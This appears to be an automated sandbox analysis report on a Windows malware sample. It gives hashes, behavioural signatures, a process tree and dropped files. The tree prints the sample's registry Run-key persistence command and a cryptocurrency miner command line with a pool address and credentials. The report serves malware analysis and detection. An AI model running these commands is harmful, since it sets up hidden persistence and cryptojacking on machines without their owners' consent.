Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/03/2024, 15:36

General

  • Target

    d67b451c8db3e0babe2dad4c94c5e786.exe

  • Size

    905KB

  • MD5

    d67b451c8db3e0babe2dad4c94c5e786

  • SHA1

    c337ce6310cfaf74ad257ea08d56377187385c5b

  • SHA256

    226e8dff03a2cde7b37c15d453584b8693d26e30a7321b0e2e45b5fe44cd94d2

  • SHA512

    48755ab9e72fb70f065015427aadf7c796f4dcf70fe9d197a7070ab345ebad9b40aaed0bac162f524777299d2dcc076bd3fc9729a7c62e7953fa543fbdb5d66f

  • SSDEEP

    24576:F+g1zsXRoWC8DZgLr2vY6f0iRq/dDPGyKO8KVWhBSXlQzD6MYA:7X6M2t8iRidmKEfSA6lA

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 15 IoCs
  • UPX packed file 42 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 8 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d67b451c8db3e0babe2dad4c94c5e786.exe
    "C:\Users\Admin\AppData\Local\Temp\d67b451c8db3e0babe2dad4c94c5e786.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3260
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hZgTp.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3952
      • C:\Windows\SysWOW64\reg.exe
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run32.dll" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Run32.exe" /f
        3⤵
        • Adds Run key to start application
        PID:2248
    • C:\Users\Admin\AppData\Roaming\Run32.exe
      "C:\Users\Admin\AppData\Roaming\Run32.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2424
      • C:\Users\Admin\AppData\Roaming\Run32.exe
        C:\Users\Admin\AppData\Roaming\Run32.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:3212
        • C:\Users\Admin\AppData\Local\Temp\udpconmain.exe
          "C:\Users\Admin\AppData\Local\Temp\udpconmain.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1340
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TDoNr.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2548
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run32.dll" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Run32.exe" /f
              6⤵
              • Adds Run key to start application
              PID:964
          • C:\Users\Admin\AppData\Roaming\Run32.exe
            "C:\Users\Admin\AppData\Roaming\Run32.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3204
            • C:\Users\Admin\AppData\Roaming\Run32.exe
              C:\Users\Admin\AppData\Roaming\Run32.exe
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of WriteProcessMemory
              PID:2932
              • C:\Users\Admin\AppData\Local\Temp\udpconmain.exe
                "C:\Users\Admin\AppData\Local\Temp\udpconmain.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:2888
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZETpS.bat" "
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1060
                  • C:\Windows\SysWOW64\reg.exe
                    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run32.dll" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Run32.exe" /f
                    9⤵
                    • Adds Run key to start application
                    PID:1712
                • C:\Users\Admin\AppData\Roaming\Run32.exe
                  "C:\Users\Admin\AppData\Roaming\Run32.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:396
                  • C:\Users\Admin\AppData\Roaming\Run32.exe
                    C:\Users\Admin\AppData\Roaming\Run32.exe
                    9⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Suspicious use of WriteProcessMemory
                    PID:864
                    • C:\Users\Admin\AppData\Local\Temp\udpconmain.exe
                      "C:\Users\Admin\AppData\Local\Temp\udpconmain.exe"
                      10⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Suspicious use of SetWindowsHookEx
                      PID:4856
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BuPyK.bat" "
                        11⤵
                          PID:3988
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run32.dll" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Run32.exe" /f
                            12⤵
                            • Adds Run key to start application
                            PID:3696
                        • C:\Users\Admin\AppData\Roaming\Run32.exe
                          "C:\Users\Admin\AppData\Roaming\Run32.exe"
                          11⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of SetWindowsHookEx
                          PID:1820
                          • C:\Users\Admin\AppData\Roaming\Run32.exe
                            C:\Users\Admin\AppData\Roaming\Run32.exe
                            12⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Adds Run key to start application
                            PID:3580
                            • C:\Users\Admin\AppData\Local\Temp\udpconmain.exe
                              "C:\Users\Admin\AppData\Local\Temp\udpconmain.exe"
                              13⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of SetWindowsHookEx
                              PID:3788
                              • C:\Users\Admin\AppData\Local\Temp\udpconmain.exe
                                C:\Users\Admin\AppData\Local\Temp\udpconmain.exe
                                14⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2492
                                • C:\Users\Admin\AppData\Local\Temp\miner.exe
                                  "C:\Users\Admin\AppData\Local\Temp\miner.exe" -a 5 -o http://pool.bitclockers.com:8332 -u danf6098 -p test6098 -t 1
                                  15⤵
                                  • Executes dropped EXE
                                  PID:8
                                • C:\Users\Admin\AppData\Local\Temp\unzip.exe
                                  "C:\Users\Admin\AppData\Local\Temp\unzip.exe" payload.zip
                                  15⤵
                                  • Executes dropped EXE
                                  PID:4808
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\help.bat" "
                              13⤵
                                PID:2200
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\help.bat" "
                          10⤵
                            PID:3500
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\help.bat" "
                      7⤵
                        PID:2956
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\help.bat" "
                  4⤵
                    PID:2216

            Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\hZgTp.bat

                    Filesize

                    134B

                    MD5

                    52dd81881fa3a9e2f376bb73bde15b00

                    SHA1

                    9440375fb9fb0368f982754f76e2efd295b25463

                    SHA256

                    a937077f0e234149b1e15e413d33c9f55ad3f427be87d806719c96b3b95209a2

                    SHA512

                    80c8f687f6c58bd0549c29e7df64fa5585fa877ac5505a72772ba0cae44b01397bd4e2c217681f8662ea5aff69f115c3fbc306c6b1c3e33d9089aa4f887d2fb0

                  • C:\Users\Admin\AppData\Local\Temp\help.bat

                    Filesize

                    98B

                    MD5

                    33a78de2abb4b7a769e78b6b9684ccd6

                    SHA1

                    bbdade2f8ae1daa4950f02aaec037a54d9f350a4

                    SHA256

                    fbefb6d6d38109b8ef7a2118aa479dc0da35d878a46332d06d7e36c738b8533c

                    SHA512

                    9df3cbd2e8b016a7dd5e135c913a8a123876cb526eec5899fbb1e890b51b0e4fc52a4e9630dfc3dfef454c9cc8dbd213e65561617fe3d8785e4f4899d6752e0a

                  • C:\Users\Admin\AppData\Local\Temp\miner.exe

                    Filesize

                    661KB

                    MD5

                    134e2763e01adae5220afbcf0e22e885

                    SHA1

                    caeeeb4136f356df466224fda3fb5202c2c01bf7

                    SHA256

                    5cef54487ac72c7d839851dff4e10319b23d57c61bf67a292369afb64504d1f7

                    SHA512

                    a0bebb0d989dffc15beab3c30a9a66b8d204304f214be342075359c6b8e35a417ceca86eee82642b433cdd2b6018ebd67693af4553b63d0ed7a805633b060167

                  • C:\Users\Admin\AppData\Local\Temp\miner.exe

                    Filesize

                    718KB

                    MD5

                    6c6f76ca42ccc2a457c150199e4ae67e

                    SHA1

                    009e3895f8e003fc1490eee75649f597143ec665

                    SHA256

                    bfa598865a9fdfbefe27a1af43b520282638ea7f3969e832373da8d1306b8ecc

                    SHA512

                    6f270209ecec15bd1da2903cf1084301e3c5ccc73ab6c15e33ee6dfa1917f5681bb8dbce830ea9387a22cf10a8ceee1a4cde6685e327fe17600fcefed04b1e7d

                  • C:\Users\Admin\AppData\Local\Temp\miner.exe

                    Filesize

                    699KB

                    MD5

                    d52b29271c7c6e1c618b0a27c0850f38

                    SHA1

                    411143b350ebe245478c50a70c4c7558d50c7c16

                    SHA256

                    99a99bc12b90c4c2253d17560bf8973bdb261aa2c3ccfdbcbe5b08676ce95cc4

                    SHA512

                    6e998ab2922503438db2ea89b309f767ada39b147ee135bd25e0fc785c24fce235392356642cfc8871189e6918b5fb864f10644c8fb84dcc514bfd46e5e861b5

                  • C:\Users\Admin\AppData\Local\Temp\udpconmain.exe

                    Filesize

                    342KB

                    MD5

                    be686907c1bdd9c071cbecfc83a32c2c

                    SHA1

                    7f6577956479367a046be290029f5eb069374837

                    SHA256

                    b9f5ef0a44ed9eeb3c66b6f6ab19db254ad92b80debe7e103a7a287b1682ca85

                    SHA512

                    79095536102973d53438dec368ebeafa9d5957a522bc70a7e042f1b7452e10a2369f31a45489633694559552bf9a23edd37d804707c310c68d4847d751a3001d

                  • C:\Users\Admin\AppData\Local\Temp\udpconmain.exe

                    Filesize

                    27KB

                    MD5

                    e8fd273119b11bcb6e1df5e4254c5e2e

                    SHA1

                    6a2382a8b12279f8f74b419a8d3b93d9b1f4bf35

                    SHA256

                    99cddc876cd200e1a727f66cc03a9254a9201d39a68d40675c961895215312ab

                    SHA512

                    acb7ed80e87866939a1d9fd3b2c7f6bceba59df255a8c4a8394061d9dd0b8fb60ad6c24926800344aa7b79eb4ed08f02c161dbe762bde1079fbea03d81c8c352

                  • C:\Users\Admin\AppData\Local\Temp\udpconmain.exe

                    Filesize

                    800KB

                    MD5

                    1e11502a31fd92d649b5a2571784c5df

                    SHA1

                    327186163cbe51b50583b92f204a71b1641d9dc3

                    SHA256

                    0cf4b43c4b908cbcda0f30340cb8c5f634cf26332668a9f5dee5bb47e4ab7e93

                    SHA512

                    41f3b9289be39c253933c92a2855c4052d273c194e964410e21d6c1708407a0edfb144155229ac09a1bbd1b9d37665a7544634ef138634387f58b60ad7c397a5

                  • C:\Users\Admin\AppData\Local\Temp\udpconmain.exe

                    Filesize

                    755KB

                    MD5

                    63fd3df5bccfc0f0252325653db559ea

                    SHA1

                    61f39c02314da4bd08713540100cb164646d84f8

                    SHA256

                    390008b3efe1cce7fd9594b03a7dce639a82350004e2f91c2d1835f2bc226039

                    SHA512

                    15e0b376b6794a3881ea75240841a51a82bd6a46b19cfc470eab23458c2eb9f0021dd35d8da2decc7a8ba1791e150d52d8ab7d00c476546dc6a80d88cfae99cc

                  • C:\Users\Admin\AppData\Local\Temp\unzip.exe

                    Filesize

                    164KB

                    MD5

                    75375c22c72f1beb76bea39c22a1ed68

                    SHA1

                    e1652b058195db3f5f754b7ab430652ae04a50b8

                    SHA256

                    8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a

                    SHA512

                    1b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a

                  • C:\Users\Admin\AppData\Roaming\Run32.exe

                    Filesize

                    554KB

                    MD5

                    f505c6293bba53b0dbb752b0299311fe

                    SHA1

                    ece062b79cd9c93de3509886870b3aae1414ecb5

                    SHA256

                    ac527c05f4c0a8bff8f91d6cb7076f6d00d42aab2c41e169a62498e642ec01bd

                    SHA512

                    c0fe8d4c91afb6eb8eff7935b1aed7c97ac72ab32c6b65325496891e704abf17c7cc23540a19603d9cf8f794fc2c4815e1531fad53d9823cedf4427adc0e2a08

                  • C:\Users\Admin\AppData\Roaming\Run32.exe

                    Filesize

                    268KB

                    MD5

                    5395c1aa4b132c368dbd7d6b307c4814

                    SHA1

                    177a9de558d30adfef7438d2d5c281c261f5fa49

                    SHA256

                    d90544e9b5a40cbe9dc0df54a4d8470778da6d59b1663701fb541679e1d7641d

                    SHA512

                    bc21a31ee5dd2353d927304f74a2961e1c2749200310974d24a9f100338ff9055c01e2f47adda7d05b434a530e629461c1c5629c626b754152d6c9f1da5f86a5

                  • C:\Users\Admin\AppData\Roaming\Run32.exe

                    Filesize

                    58KB

                    MD5

                    9b241c6c822bc777dc8aaba5299e6760

                    SHA1

                    c1a89255cbcdb3f35c2ffc29c65fa6e738442b86

                    SHA256

                    d015a0005aa12ad6173b1a957ca272ad44fca98dacb658dab2ea457eeadc7d07

                    SHA512

                    9177e7f723dbb5cdf62929b8453d6ebcee46ae8abf6824ac048115d95b077ac3f5bcbd6337eb738fe5c1e4352aaeda438032b20259ce12ed4a4a6d9fe87a125f

                  • C:\Users\Admin\AppData\Roaming\Run32.exe

                    Filesize

                    905KB

                    MD5

                    d67b451c8db3e0babe2dad4c94c5e786

                    SHA1

                    c337ce6310cfaf74ad257ea08d56377187385c5b

                    SHA256

                    226e8dff03a2cde7b37c15d453584b8693d26e30a7321b0e2e45b5fe44cd94d2

                    SHA512

                    48755ab9e72fb70f065015427aadf7c796f4dcf70fe9d197a7070ab345ebad9b40aaed0bac162f524777299d2dcc076bd3fc9729a7c62e7953fa543fbdb5d66f

                  • C:\Users\Admin\AppData\Roaming\Run32.exe

                    Filesize

                    116KB

                    MD5

                    d604e15bd7222a274be00637962d6d64

                    SHA1

                    f18556b19d7603c74ec20c0f1fa246ca3c2053b2

                    SHA256

                    7868994a5b1142e6b5b461bce0e58b5ec41cc47f537092fd0793ec5ae821a665

                    SHA512

                    4deb30802c75063ec9c23c4da6f6c11a450229066629aa77fb32db7d63a12bf1400bf9702b4be73f7b8080277a059cc0b0d0213203350913a9827f38bcf9c442

                  • C:\Users\Admin\AppData\Roaming\Run32.exe

                    Filesize

                    369KB

                    MD5

                    26174007373e9a591776ec47f6653b43

                    SHA1

                    b8fb9ca3f385c9cb9671cb744bbc72851175bc30

                    SHA256

                    b9b21c9ae20c6450f7e9ca21e13ede18980246da070670afded9e5efab27ad46

                    SHA512

                    21221dd6d3ab0031828dd9a2c5dcc058cf82faaff2b09abe87c7db1c2415eb03436083d3fea8a5e19db869f4f7236a0f86a8ef69c3610a112f854c8a7a14976b

                  • C:\Users\Admin\AppData\Roaming\Run32.exe

                    Filesize

                    321KB

                    MD5

                    b09c5a6fbdbfde779627bb1577a02edf

                    SHA1

                    0265127f374c42ec1efb237dc68067fc005b1ae3

                    SHA256

                    7e2126b6036e9b454e5b4fbc7118c84bc759c6085d3f88867895190320d9ca80

                    SHA512

                    62b9c07dc180c31caa95f6759d4cfed24fe9cb18f0aed3bad42baeb42e180ac8bb784e9fa0d7adad01e1ca89859eb9a66336b0cb0ad320a15f3b48152ef8f5e2

                  • C:\Users\Admin\AppData\Roaming\Run32.exe

                    Filesize

                    417KB

                    MD5

                    45779b9d7943ff9ffe1d43339698423e

                    SHA1

                    bf557b8fb68687bb2bd6bf79985ea2a23269517b

                    SHA256

                    cd9e4b019ce6f241836ddc17564450c52c6f9d31a77757d4a2731742a278c2bb

                    SHA512

                    c313402986b528c2afa7ac2f1f6fcfe22c3d9b1c6e3d2ad17be2a2ff12e391df9e0e18e5fc73acda8cb0f846b94f3ab46f84e5ccc35db8ce1ec02ff4f10d4544

                  • memory/396-118-0x0000000000400000-0x0000000000CD9000-memory.dmp

                    Filesize

                    8.8MB

                  • memory/396-109-0x0000000000400000-0x0000000000CD9000-memory.dmp

                    Filesize

                    8.8MB

                  • memory/864-136-0x0000000000400000-0x00000000004FF000-memory.dmp

                    Filesize

                    1020KB

                  • memory/864-134-0x0000000000CA0000-0x0000000000E21000-memory.dmp

                    Filesize

                    1.5MB

                  • memory/1340-44-0x0000000000400000-0x0000000000CD9000-memory.dmp

                    Filesize

                    8.8MB

                  • memory/1340-63-0x0000000000400000-0x0000000000CD9000-memory.dmp

                    Filesize

                    8.8MB

                  • memory/1820-163-0x0000000000400000-0x0000000000CD9000-memory.dmp

                    Filesize

                    8.8MB

                  • memory/2424-25-0x0000000000400000-0x0000000000CD9000-memory.dmp

                    Filesize

                    8.8MB

                  • memory/2492-224-0x0000000000400000-0x00000000004FF000-memory.dmp

                    Filesize

                    1020KB

                  • memory/2492-222-0x0000000000400000-0x00000000004FF000-memory.dmp

                    Filesize

                    1020KB

                  • memory/2492-193-0x0000000000400000-0x00000000004FF000-memory.dmp

                    Filesize

                    1020KB

                  • memory/2888-110-0x0000000000400000-0x0000000000CD9000-memory.dmp

                    Filesize

                    8.8MB

                  • memory/2888-87-0x0000000000400000-0x0000000000CD9000-memory.dmp

                    Filesize

                    8.8MB

                  • memory/2932-72-0x0000000000400000-0x00000000004FF000-memory.dmp

                    Filesize

                    1020KB

                  • memory/2932-73-0x0000000000400000-0x00000000004FF000-memory.dmp

                    Filesize

                    1020KB

                  • memory/2932-90-0x0000000000400000-0x00000000004FF000-memory.dmp

                    Filesize

                    1020KB

                  • memory/2932-70-0x0000000000400000-0x00000000004FF000-memory.dmp

                    Filesize

                    1020KB

                  • memory/3204-62-0x0000000000400000-0x0000000000CD9000-memory.dmp

                    Filesize

                    8.8MB

                  • memory/3204-71-0x0000000000400000-0x0000000000CD9000-memory.dmp

                    Filesize

                    8.8MB

                  • memory/3212-42-0x0000000000400000-0x00000000004FF000-memory.dmp

                    Filesize

                    1020KB

                  • memory/3212-27-0x0000000000400000-0x00000000004FF000-memory.dmp

                    Filesize

                    1020KB

                  • memory/3212-24-0x0000000000400000-0x00000000004FF000-memory.dmp

                    Filesize

                    1020KB

                  • memory/3212-21-0x0000000000400000-0x00000000004FF000-memory.dmp

                    Filesize

                    1020KB

                  • memory/3260-0-0x0000000000400000-0x0000000000CD9000-memory.dmp

                    Filesize

                    8.8MB

                  • memory/3260-18-0x0000000000400000-0x0000000000CD9000-memory.dmp

                    Filesize

                    8.8MB

                  • memory/3580-182-0x0000000000400000-0x00000000004FF000-memory.dmp

                    Filesize

                    1020KB

                  • memory/3580-181-0x0000000000CC0000-0x0000000000E41000-memory.dmp

                    Filesize

                    1.5MB

                  • memory/3580-165-0x0000000000400000-0x00000000004FF000-memory.dmp

                    Filesize

                    1020KB

                  • memory/3788-179-0x0000000000400000-0x0000000000CD9000-memory.dmp

                    Filesize

                    8.8MB

                  • memory/3788-191-0x0000000000400000-0x0000000000CD9000-memory.dmp

                    Filesize

                    8.8MB

                  • memory/4856-155-0x0000000000400000-0x0000000000CD9000-memory.dmp

                    Filesize

                    8.8MB

                  • memory/4856-135-0x0000000000400000-0x0000000000CD9000-memory.dmp

                    Filesize

                    8.8MB